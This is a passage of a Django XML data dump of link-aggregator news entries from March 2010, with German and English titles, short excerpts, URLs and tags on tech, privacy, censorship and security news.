&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Bericht-Google-macht-chinesische-Suchmaschine-im-April-dicht-959551.html</field><field type="FileField" name="page_screenshot">page_shots/2010/03/19/google-about-to-pull-the-plug-in-china.png</field><field type="SlugField" name="slug">google-about-to-pull-the-plug-in-china</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-19 17:32:45</field><field to="show.pentashow" name="show" rel="ManyToOneRel">1</field><field type="CharField" name="tags_string">china google</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="4"></object></field></object><object pk="24" model="submitter.newsentry"><field type="CharField" name="title">Petition: Franziska Heine Briefmarke</field><field type="TextField" name="excerpt">Franziska Heine, die Initiatorin der erfolgreichsten Bundestagspetition aller Zeiten, bekommt für ihren herausragenden Einsatz für die Meinungs-, Informations- und Pressefreiheit von der Deutschen Post eine eigene Briefmarke.
Wenn du es willst!
Die Post hat eine Umfrage gestartet, welcher Persönlichkeit eine eigene Briefmarke gewidmet werden soll. Ich bin der Meinung, dass sich Franziska diese Ehre mehr als verdient hat. Um an der Umfrage teilzunehmen und für Franziska zu stimmen, müsst ihr lediglich dieses [Formular](https://docs.google.com/fileview?id=0B5MlxeeHZ0xbYmEzYWVjZmQtZWFiMi00NDRkLWFmZmEtMzIxZjViZDdmNDY1&amp;hl=en) herunterladen (PDF), ausdrucken, euren Namen und eure Postanschrift in das Adressfeld eintragen und mit Datum unterschreiben. Dann entweder unfrei (keine Briefmarke nötig!) an folgende Adresse schicken:
Deutsche Post AG
Niederlassung Philatelie
Abteilung 6956 vpwe
Postfach 11 14
92623 Weiden
Oder per Fax an: 01803 / 24 68 69 (9 Cent pro Minute)</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Franziska Heine, die Initiatorin der erfolgreichsten Bundestagspetition aller Zeiten, bekommt für ihren herausragenden Einsatz für die Meinungs-, Informations- und Pressefreiheit von der Deutschen Post eine eigene Briefmarke.
&lt;/p&gt;
&lt;p&gt;Wenn du es willst!
&lt;/p&gt;
&lt;p&gt;Die Post hat eine Umfrage gestartet, welcher Persönlichkeit eine eigene Briefmarke gewidmet werden soll. Ich bin der Meinung, dass sich Franziska diese Ehre mehr als verdient hat. Um an der Umfrage teilzunehmen und für Franziska zu stimmen, müsst ihr lediglich dieses &lt;a href="https://docs.google.com/fileview?id=0B5MlxeeHZ0xbYmEzYWVjZmQtZWFiMi00NDRkLWFmZmEtMzIxZjViZDdmNDY1&amp;amp;hl=en"&gt;Formular&lt;/a&gt; herunterladen (PDF), ausdrucken, euren Namen und eure Postanschrift in das Adressfeld eintragen und mit Datum unterschreiben. Dann entweder unfrei (keine Briefmarke nötig!) an folgende Adresse schicken:
&lt;/p&gt;
&lt;p&gt;Deutsche Post AG
Niederlassung Philatelie
Abteilung 6956 vpwe
Postfach 11 14
92623 Weiden
&lt;/p&gt;
&lt;p&gt;Oder per Fax an: 01803 / 24 68 69 (9 Cent pro Minute)
&lt;/p&gt;</field><field type="CharField" name="external_url">http://wii1and.blogspot.com/2010/03/franziska-heine-bekommt-eigene.html?spref=tw</field><field type="FileField" name="page_screenshot">page_shots/2010/03/19/petition-franziska-heine-briefmarke.png</field><field type="SlugField" name="slug">petition-franziska-heine-briefmarke</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-19 15:37:47</field><field to="show.pentashow" name="show" rel="ManyToOneRel">1</field><field type="CharField" name="tags_string">censorship</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="4"></object></field></object><object pk="23" model="submitter.newsentry"><field type="CharField" name="title">Hackable Linux clamshell goes on sale for $99</field><field type="TextField" name="excerpt"></field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html"></field><field type="CharField" name="external_url">http://www.linuxfordevices.com/c/a/News/Qi-Hardware-Ben-NanoNote/</field><field type="FileField" name="page_screenshot">page_shots/2010/03/19/no_page_shot.png</field><field type="SlugField" name="slug">hackable-linux-clamshell-goes-on-sale-for-99</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-19 15:01:09</field><field to="show.pentashow" name="show" rel="ManyToOneRel">1</field><field type="CharField" name="tags_string">hardware</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"></field></object><object pk="22" model="submitter.newsentry"><field type="CharField" name="title">Boni für KK-Manager</field><field type="TextField" name="excerpt">Das übliche, schöne Boni für Manager....</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Das übliche, schöne Boni für Manager....
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.1a-krankenversicherung.org/nachrichten/20100310/7440/trotz-zusatzbeitrag-boni-von-ueber-50-000-euro/</field><field type="FileField" name="page_screenshot">page_shots/2010/03/19/boni-fur-kk-manager.png</field><field type="SlugField" name="slug">boni-fur-kk-manager</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">6</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-19 13:16:11</field><field to="show.pentashow" name="show" rel="ManyToOneRel">1</field><field type="CharField" name="tags_string">boni manager</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="21" model="submitter.newsentry"><field type="CharField" name="title">Apple will not replace ipad batteries - The Inquirer</field><field type="TextField" name="excerpt"></field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html"></field><field type="CharField" name="external_url">http://www.theinquirer.net/inquirer/news/1596392/apple-replace-ipad-batteries</field><field type="FileField" name="page_screenshot">page_shots/2010/03/19/apple-will-not-replace-ipa.png</field><field type="SlugField" name="slug">apple-will-not-replace-ipa</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-18 23:21:03</field><field to="show.pentashow" name="show" rel="ManyToOneRel">1</field><field type="CharField" name="tags_string">apple ipad</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="20" model="submitter.newsentry"><field type="CharField" name="title">Petition gegen ELENA vom Foebud</field><field type="TextField" name="excerpt"></field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html"></field><field type="CharField" name="external_url">https://petition.foebud.org/ELENA</field><field type="FileField" name="page_screenshot">page_shots/2010/03/18/petition-gegen-elena-vom-foebud.png</field><field type="SlugField" name="slug">petition-gegen-elena-vom-foebud</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-18 20:56:47</field><field to="show.pentashow" name="show" rel="ManyToOneRel">1</field><field type="CharField" name="tags_string">petition</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="19" model="submitter.newsentry"><field type="CharField" name="title">eBook reading application</field><field type="TextField" name="excerpt">file sharing build in, many cool features, </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;file sharing build in, many cool features,
&lt;/p&gt;</field><field type="CharField" name="external_url">http://calibre-ebook.com/</field><field type="FileField" name="page_screenshot">page_shots/2010/03/18/ebook-reading-application.png</field><field type="SlugField" name="slug">ebook-reading-application</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-18 17:24:21</field><field to="show.pentashow" name="show" rel="ManyToOneRel">1</field><field type="CharField" name="tags_string">ebook</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="2"></object></field></object><object pk="18" model="submitter.newsentry"><field type="CharField" name="title">Apple's patent attack [LWN.net]</field><field type="TextField" name="excerpt"></field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html"></field><field type="CharField" name="external_url">http://lwn.net/Articles/376793/</field><field type="FileField" name="page_screenshot">page_shots/2010/03/18/apples-patent-attack-lwnnet.png</field><field type="SlugField" name="slug">apples-patent-attack-lwnnet</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-18 16:19:49</field><field to="show.pentashow" name="show" rel="ManyToOneRel">1</field><field type="CharField" name="tags_string">apple patent phone</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="1"></object></field></object><object pk="17" model="submitter.newsentry"><field type="CharField" name="title">Yahoo patents News Feeds</field><field type="TextField" name="excerpt"></field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html"></field><field type="CharField" name="external_url">http://news.yahoo.com/s/nf/20100226/tc_nf/71887</field><field type="FileField" name="page_screenshot">page_shots/2010/03/18/yahoo-patents-news-feeds.png</field><field type="SlugField" name="slug">yahoo-patents-news-feeds</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-18 16:17:37</field><field to="show.pentashow" name="show" rel="ManyToOneRel">1</field><field type="CharField" name="tags_string">facebook patent</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="1"></object></field></object><object pk="16" model="submitter.newsentry"><field type="CharField" name="title">heise online - Merkelphones kommen sich näher</field><field type="TextField" name="excerpt">Im vergangenen Jahr hatte die Bundesregierung Rahmenverträge über die Lieferung von Kryptohandys dieser Firmen mit einem Volumen von 21 Millionen Euro abgeschlossen.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Im vergangenen Jahr hatte die Bundesregierung Rahmenverträge über die Lieferung von Kryptohandys dieser Firmen mit einem Volumen von 21 Millionen Euro abgeschlossen.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Merkelphones-kommen-sich-naeher-938510.html</field><field type="FileField" name="page_screenshot">page_shots/2010/03/18/heise-online-merkelphones-kommen-sich-naher.png</field><field type="SlugField" name="slug">heise-online-merkelphones-kommen-sich-naher</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-18 16:15:29</field><field to="show.pentashow" name="show" rel="ManyToOneRel">1</field><field type="CharField" name="tags_string">crypto merkel phone</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"></field></object><object pk="15" model="submitter.newsentry"><field type="CharField" name="title">Wikileaks im Visier von US-Militärgeheimdienst </field><field type="TextField" name="excerpt">In einem 30 Seiten langen Bericht (PDF-Datei) untersucht das Counterintelligence Center der US-Armee (ACIC) geheime Dokumente zum Irak-Krieg und Guantanamo Bay, die Wikileaks veröffentlicht hatte und macht verschiedene Vorschläge, wie gegen die Plattform vorgegangen werden soll.
Kern: Trust in WL erschüttern, Angst vor Enttarnung machen.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;In einem 30 Seiten langen Bericht (PDF-Datei) untersucht das Counterintelligence Center der US-Armee (ACIC) geheime Dokumente zum Irak-Krieg und Guantanamo Bay, die Wikileaks veröffentlicht hatte und macht verschiedene Vorschläge, wie gegen die Plattform vorgegangen werden soll.
&lt;/p&gt;
&lt;p&gt;Kern: Trust in WL erschüttern, Angst vor Enttarnung machen.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Wikileaks-im-Visier-von-US-Militaergeheimdienst-955451.html</field><field type="FileField" name="page_screenshot">page_shots/2010/03/18/wikileaks-im-visier-von-us-militargeheimdienst-.png</field><field type="SlugField" name="slug">wikileaks-im-visier-von-us-militargeheimdienst-</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-18 16:03:30</field><field to="show.pentashow" name="show" rel="ManyToOneRel">1</field><field type="CharField" name="tags_string">wikileaks</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"></field></object><object pk="14" model="submitter.newsentry"><field type="CharField" name="title">Microsoft Was Behind Google Complaints To EC | eWEEK Europe UK</field><field type="TextField" name="excerpt"></field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html"></field><field type="CharField" name="external_url">http://www.eweekeurope.co.uk/news/microsoft-was-behind-google-complaints-to-ec-5555</field><field type="FileField" name="page_screenshot">page_shots/2010/03/18/microsoft-was-behind-google-complaints-to-ec-ew.png</field><field type="SlugField" name="slug">microsoft-was-behind-google-complaints-to-ec-ew</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-18 15:59:14</field><field to="show.pentashow" name="show" rel="ManyToOneRel">1</field><field type="CharField" name="tags_string">google microsoft</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"></field></object><object pk="13" model="submitter.newsentry"><field type="CharField" name="title"> Microsoft: Don't press F1 key in Windows XP</field><field type="TextField" name="excerpt"></field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html"></field><field type="CharField" name="external_url">http://www.computerworld.com/s/article/9164038/Microsoft_Don_t_press_F1_key_in_Windows_XP</field><field type="FileField" name="page_screenshot">page_shots/2010/03/19/-microsoft-dont-press-f1-key-in-windows-xp.png</field><field type="SlugField" name="slug">-microsoft-dont-press-f1-key-in-windows-xp</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-18 15:45:44</field><field to="show.pentashow" name="show" rel="ManyToOneRel">1</field><field type="CharField" name="tags_string">exploit microsoft windows</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="9"></object></field></object><object pk="12" model="submitter.newsentry"><field type="CharField" name="title">Cryptome Paypal account blocked</field><field type="TextField" name="excerpt"></field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html"></field><field type="CharField" name="external_url">http://cryptome.org/0001/cryptome-sar.htm</field><field type="FileField" name="page_screenshot">page_shots/2010/03/18/cryptome-paypal-account-blocked.png</field><field type="SlugField" name="slug">cryptome-paypal-account-blocked</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-18 15:30:15</field><field to="show.pentashow" name="show" rel="ManyToOneRel">1</field><field type="CharField" name="tags_string">paypal</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"></field></object><object pk="11" model="submitter.newsentry"><field type="CharField" name="title">Facebook founder Mark Zuckerberg of hacking into the email accounts of rivals and journalists</field><field type="TextField" name="excerpt"></field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html"></field><field type="CharField" name="external_url">http://www.businessinsider.com/how-facebook-was-founded-2010-3</field><field type="FileField" name="page_screenshot">page_shots/2010/03/18/facebook-founder-mark-zuckerberg-of-hacking-into-t.png</field><field type="SlugField" name="slug">facebook-founder-mark-zuckerberg-of-hacking-into-t</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-18 15:26:25</field><field to="show.pentashow" name="show" rel="ManyToOneRel">1</field><field type="CharField" name="tags_string">facebook privacy</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"></field></object><object pk="10" model="submitter.newsentry"><field type="CharField" name="title">322Tbit/sec Router available cisco</field><field type="TextField" name="excerpt"></field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html"></field><field type="CharField" name="external_url">http://www.computerworld.com/s/article/9168058/Cisco_unveils_next_Internet_core_router</field><field type="FileField" name="page_screenshot">page_shots/2010/03/18/322tbitsec-router-available-cisco.png</field><field type="SlugField" name="slug">322tbitsec-router-available-cisco</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-18 15:21:33</field><field to="show.pentashow" name="show" rel="ManyToOneRel">1</field><field type="CharField" name="tags_string">hardware router</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"></field></object><object pk="9" model="submitter.newsentry"><field type="CharField" name="title">ARM based iPad clones on the way</field><field type="TextField" name="excerpt"></field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html"></field><field type="CharField" name="external_url">http://www.computerworld.com/s/article/9168418/ARM_sees_over_50_new_iPad_like_devices_out_this_year</field><field type="FileField" name="page_screenshot">page_shots/2010/03/18/arm-based-ipad-clones-on-the-way.png</field><field type="SlugField" name="slug">arm-based-ipad-clones-on-the-way</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-18 15:14:35</field><field to="show.pentashow" name="show" rel="ManyToOneRel">1</field><field type="CharField" name="tags_string">apple hardware ipad</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"></field></object><object pk="8" model="submitter.newsentry"><field type="CharField" name="title">Filter company doesn't belive in filtering</field><field type="TextField" name="excerpt"></field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html"></field><field type="CharField" name="external_url">http://www.arnnet.com.au/article/339394/filter_trial_vendor_sceptical_over_internet_clean-feed/?fp=4194304&amp;fpid=1</field><field type="FileField" name="page_screenshot">page_shots/2010/03/18/filter-company-doesnt-belive-in-filtering.png</field><field type="SlugField" name="slug">filter-company-doesnt-belive-in-filtering</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-18 15:10:57</field><field to="show.pentashow" name="show" rel="ManyToOneRel">1</field><field type="CharField" name="tags_string">censorship</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"></field></object><object pk="7" model="submitter.newsentry"><field type="CharField" name="title">25 years anniversary of 1st .com address</field><field type="TextField" name="excerpt"></field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html"></field><field type="CharField" name="external_url">http://news.bbc.co.uk/2/hi/technology/8567414.stm</field><field type="FileField" name="page_screenshot">page_shots/2010/03/18/25-years-anniversary-of-1st-com-address_.png</field><field type="SlugField" name="slug">25-years-anniversary-of-1st-com-address</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-18 15:07:58</field><field to="show.pentashow" name="show" rel="ManyToOneRel">1</field><field type="CharField" name="tags_string">anniversary domain historic</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="6"></object></field></object><object pk="6" model="submitter.newsentry"><field type="CharField" name="title">Pirate Bay legal action dropped in Norway - Legislation/regulation/privacy - ComputerworldUK</field><field type="TextField" name="excerpt"></field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html"></field><field type="CharField" name="external_url">http://www.computerworlduk.com/management/government-law/legislation/news/index.cfm?newsid=19371</field><field type="FileField" name="page_screenshot">page_shots/2010/03/18/pirate-bay-legal-action-dropped-in-norway-legisl.png</field><field type="SlugField" name="slug">pirate-bay-legal-action-dropped-in-norway-legisl</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-18 14:59:38</field><field to="show.pentashow" name="show" rel="ManyToOneRel">1</field><field type="CharField" name="tags_string">piratebay</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"></field></object><object pk="5" model="submitter.newsentry"><field type="CharField" name="title">heise online - US-Strafverfolger nutzen soziale Netzwerke für verdeckte Ermittlungen</field><field type="TextField" name="excerpt"></field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html"></field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/US-Strafverfolger-nutzen-soziale-Netzwerke-fuer-verdeckte-Ermittlungen-956796.html</field><field type="FileField" name="page_screenshot">page_shots/2010/03/18/heise-online-us-strafverfolger-nutzen-soziale-ne.png</field><field type="SlugField" name="slug">heise-online-us-strafverfolger-nutzen-soziale-ne</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-18 14:56:35</field><field to="show.pentashow" name="show" rel="ManyToOneRel">1</field><field type="CharField" name="tags_string">crime socialnet</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="4" model="submitter.newsentry"><field type="CharField" name="title">Mac OS X: "geringeres Risiko, aber letztlich unsicherer"</field><field type="TextField" name="excerpt">Der Sicherheitsexperte Charlie Miller will auf einen Schlag rekordverdächtige 20 Zero-day-Sicherheitslücken in Apple Mac OS X veröffentlichen. </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Der Sicherheitsexperte Charlie Miller will auf einen Schlag rekordverdächtige 20 Zero-day-Sicherheitslücken in Apple Mac OS X veröffentlichen.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Mac-OS-X-geringeres-Risiko-aber-letztlich-unsicherer-957594.html</field><field type="FileField" name="page_screenshot">page_shots/2010/03/18/mac-os-x-geringeres-risiko-aber-letztlich-unsic.png</field><field type="SlugField" name="slug">mac-os-x-geringeres-risiko-aber-letztlich-unsic</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">3</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-18 13:54:27</field><field to="show.pentashow" name="show" rel="ManyToOneRel">1</field><field type="CharField" name="tags_string">0day mac security</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="2"></object></field></object><object pk="3" model="submitter.newsentry"><field type="CharField" name="title">Hacker Disables More Than 100 Cars Remotely | Threat Level | Wired.com</field><field type="TextField" name="excerpt"></field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html"></field><field type="CharField" name="external_url">http://www.wired.com/threatlevel/2010/03/hacker-bricks-cars/</field><field type="FileField" name="page_screenshot">page_shots/2010/03/18/hacker-disables-more-than-100-cars-remotely-thre.png</field><field type="SlugField" name="slug">hacker-disables-more-than-100-cars-remotely-thre</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-18 12:26:14</field><field to="show.pentashow" name="show" rel="ManyToOneRel">1</field><field type="CharField" name="tags_string">hack</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="5"></object></field></object><object pk="2" model="submitter.newsentry"><field type="CharField" name="title">Video für Wikipedia</field><field type="TextField" name="excerpt">Petition um Video in die Wikipedia zu bekommen. Catch: Kann nur freies Format sein. Die [Open Video Allianz](http://openvideoalliance.org/ "OVA") hängt auch mit drin.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Petition um Video in die Wikipedia zu bekommen. Catch: Kann nur freies Format sein. Die &lt;a href="http://openvideoalliance.org/" title="OVA"&gt;Open Video Allianz&lt;/a&gt; hängt auch mit drin.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.videoonwikipedia.org/</field><field type="FileField" name="page_screenshot">page_shots/2010/03/18/video-fur-wikipedia.png</field><field type="SlugField" name="slug">video-fur-wikipedia</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">2</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-18 11:37:26</field><field to="show.pentashow" name="show" rel="ManyToOneRel">1</field><field type="CharField" name="tags_string">standard video wikipedia</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object></django-objects>